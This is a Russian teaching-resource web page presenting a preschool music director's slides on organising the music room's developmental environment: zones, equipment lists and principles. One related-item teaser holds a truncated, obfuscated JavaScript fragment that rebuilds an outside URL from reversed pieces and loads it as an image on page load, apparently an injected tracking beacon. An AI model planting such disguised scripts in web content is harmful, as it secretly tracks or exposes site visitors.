Презентация " Организация РППС в музыкальном зале как средства музыкального воспитания дошкольников"
презентация
ИРОССО.2023 г . Распостронение опыта работы в рамках курсов повышения кваалификации педагогогов дошкольных образоваательных организаций Сахалинской области"Основные направления раз вития и воспитания детей! в условиях дошкольной образовательной оргаанизации"
Скачать:
Вложение | Размер |
---|---|
prezentatsiya_rpps.pptx | 1.63 МБ |
Онлайн-тренажёры музыкального слухаМузыкальная академия
Теория музыки и у Упражнения на развитие музыкального слуха для учащихся музыкальных школ и колледжей
Современно, удобно, эффективно
Предварительный просмотр:
Подписи к слайдам:
В соответствии с ФГОС ДО целью формирования музыкальной развивающей предметно-пространственной среды является развитие творческих проявлений всеми доступными, побуждающими к самовыражению средствами.
Музыкальная предметно-развивающая среда в ДОУ организуется по трем основным блокам 1. Восприятие музыки; 2. Воспроизведение музыки; 3. Музыкально-творческая деятельность.
Моделирование и наполнение музыкальной развивающей предметно-пространственной среды в группах
Моделирование и наполнение музыкальной развивающей предметно-пространственной среды в разных группах озвученные детские музыкальные игрушки и инструменты для творческого музицирования ; не озвученные игрушки (имитационные); музыкально-дидактические игры и пособия; материал для творческих сюжетно-ролевых игр; атрибуты для музыкальных подвижных игр; аудиовизуальные пособия
Моделирование и наполнение музыкальной развивающей предметно-пространственной среды в музыкальном зале
Моделирование и наполнение музыкальной развивающей предметно-пространственной среды в музыкальном зале Пространство музыкального зала можно условно разделить на три зоны : Рабочая зона Спокойная зона Активная зона
Примерный перечень оборудования и дидактических пособий в музыкальном зале 1. Наглядные пособия для восприятия: репродукции картин, иллюстрации, портреты композиторов, пособия. 2. Наглядные пособия для исполнительской деятельности: мнемотаблицы , лесенка, иллюстрации к попевкам , дидактический материал. 3 . Дидактические игры для развития музыкальных способностей: (развития тембра, развития звуковысотного слуха, восприятия музыки и эмоциональной отзывчивости на музыку, развития слуха и памяти, развития ритма, развития темпа, развития музыкального творчества, развития динамики). 4. Пособия для развития двигательных навыков: султанчики, флажки, веревочки, клубочки, ленточки, снежинки и т.д. 5 . Детские музыкальные инструменты по возрастам: озвученные инструменты, музыкальные игрушки, неозвученные инструменты, игрушки, сделанные своими руками. 6. Атрибуты для музыкально- театральной деятельности: шапочки, маски, костюмы для детей, разные виды театров, атрибуты для них. 7. Аудиотека , видеотека, интерактивные папки, мультимедиа проектор. материал по взаимодействию с педагогами и семьями.
Принципы музыкальной развивающей предметно-пространственной среды Доступность Безопасность Полифункциональность Эстетическое оформление Вариативность Учет возрастных особенностей Трансформируемость
О рганизация развивающей предметно-пространственной среды музыкального зала и групповых комнат, созданная с учетом ФГОС ДО вызывает интерес детей к музыкальному искусству, побуждает к активности, творчеству, дает возможность развивать индивидуальность каждого ребенка.
«Мастер-класс» Спиридонова Марина Геннадьевна Музыкальный руководитель МБДОУ №2 «Колокольчик» с. Троицкое
По теме: методические разработки, презентации и конспекты
Презентация на тему "Опытно-экспериментальная деятельность как средство экологического воспитания дошкольников"
Исследовательская деятельность - это путь к знанию через собственный творческий, исследовательский поиск. Развитие у детей дошкольного возраста экологических представлений, знаний о ценности пр...
Организация комплексного музыкального коррекционно-развивающего обучения и воспитания дошкольников с нарушением интеллекта средствами коррекционной ритмики
Из Сборника материалов I Всероссийской заочной электронной научной конференции «Педагогика новаторства в XXI веке» (ГОУ ВПО «Свеверо-Восточный государственный ...
Презентация опыта работы "Фитбол - гимнастика – как инновационное средство физического воспитания дошкольников"
Термин «гиподинамия» в переводе с латинского языка означает «малоподвижность». Под этим понятием подразумевают ограничение двигательной активности, возникающее в результате мал...
Презентация проекта (старшая группа) «Краеведческая деятельность как средство патриотического воспитания дошкольников»
var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...
II Критерий Организация предметно-развивающей среды и методическое оснащение музыкального зала
laquo;Паспорт музыкального зала» Музыкальный зал в детском саду – это визитная карточка детского сада. Здесь проходят не только занятия с детьми, но и всевозможные праздники, развлечения ...
«Организация развивающей предметно-пространственной среды в музыкальном зале, как средства музыкального воспитания дошкольников».
В данной статье рассматривается вопрос создания обновленной музыкальной предметно-пространственной развивающей среды в музыкальном зале, способствующей гармоничному музыкальному развитию и саморазвити...
ПРЕЗЕНТАЦИЯ МУЗЫКАЛЬНОГО ПАТРИОТИЧЕСКОГО УГОЛКА В МУЗЫКАЛЬНОМ ЗАЛЕ
ПРЕЗЕНТАЦИЯ ПАТРИОТИЧЕСКОГО УГОЛКА В МУЗЫКАЛЬНОМ ЗАЛЕ. СИМВОЛИКА РОССИИ-ТРАДИЦИОННАЯ, НЕТРАДИЦИОННАЯ.ЛЕПБУК ""МОЯ РОССИЯ".АТРИБУТЫ ДЛЯ ТАНЦЕВ И ИНСЦЕНИРОВОК, КАРТОТЕКИ НАРОДНЫХ ИГ...